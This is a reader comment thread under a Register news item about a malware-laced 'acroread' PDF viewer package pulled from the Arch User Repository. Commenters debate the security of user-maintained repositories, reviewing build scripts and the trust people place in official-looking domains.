back to article Arch Linux PDF reader package poisoned

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …

Gold badge
Unhappy

If you leave stuff by the side of the information superhighway someone will pick it up.

Who knew?

9
1
Reply

ArchLinux AUR

As an Arch user I am well aware of the potential dangers in installing software from the user maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo, outweigh the dangers; it just needs using with respect.

In general, any non-moderated repos offer this risk, it certainly is not limited to Arch.

21
0
Reply
WTF?

What, you want me to stop building packages as root using AUR helpers?

And reading every pkgbuild file? Sure, it will be more fun than reading every EULA for non-free software.

But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

17
0
Reply

Re: What, you want me to stop building packages as root using AUR helpers?

But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

Just like what he did here. He put the malicious code in a script retrieved from the Internet.

What if you have a package that retrieves "additional data" from the Internet, not only a script?

Like a game retrieving its assets for example.

Should every single byte it downloads be checked?

6
0
Reply
Bronze badge
Facepalm

The internet

Was a far better place in the 90's

Then the masses of muppets came, and with them, the sociopaths

11
9
Reply
hmv

Re: The internet

The Morris worm was in 1988, and there were certain many bad actors in the 1990s - my introduction to security was finding out why an AlphaServer 2100 was running a bit slow, and discovering it was riddled with nasty stuff.

8
0
Reply
Anonymous Coward

A dodgy acroread package? I'm shocked, I tell you!

A dodgy acroread package? It sounds as though it has replicated the functionality of the Adobe original quite accurately...

26
0
Reply
Anonymous Coward

Re: A dodgy acroread package? I'm shocked, I tell you!

No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe Linux developers...

0
5
Reply
Holmes

Re: A dodgy acroread package? I'm shocked, I tell you!

Re: A dodgy acroread package? I'm shocked, I tell you!

No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe ̶L̶i̶n̶u̶x̶ developers...<

---

Fixed!

0
0
Reply
Silver badge

To contrast that...

I have seen multiple Windows users looking for software by going to google and typing "$product free download" into it...

Yes, that's apparently still the norm for large numbers of people. BTW if you come across one of those, tell them to go to the Wikipedia page for that product (yes there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security wise. (though not perfect)

6
0
Reply
Bronze badge
Alert

Thank Goodness it's Not One of the "Major" Distributions

I don't know how many Arch servers there are out there; and thankfully, this was not a server package.

We have seriously got to protect the repos!!! PERIOD!!!

I'll leave it up to others to elaborate.

1
2
Reply

Re: Thank Goodness it's Not One of the "Major" Distributions

This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:

A) Download the build file for manually and follow some steps to build the software

or

B) Install an extra package manager to automate performing A.

I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.

1
0
Reply
Anonymous Coward

Butt butt Lunix is secure! Windoze Micro$oft blah blah blah...

3
14
Reply
Anonymous Coward

"Butt butt Lunix is secure!"

That's quite a statement for an OS that ran on the C64 with TCP/IP support and is no longer maintained.

1
0
Reply
Bronze badge

Linux is the Kernal

I don't remember hearing about the kernel ever being infected. I still worry about the repos--given how automatically an entire system can be updated.

1
0
Reply

Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about it's 'ports' like nature: it's all well and good it being more convenient than downloading a src tarball but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how may bits of linked-out code get added without downloading a corresponding patch file?).

Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).

0
0
Reply
Bronze badge

Halo effect

Don't blame the Arch team for any of this, in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes I know it doesnt deserve it and the page says you try at your own risk. but the halo effect is incredibly strong. Its why people still click on phishing emails from Microsoft Support.

2
0
Reply

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2018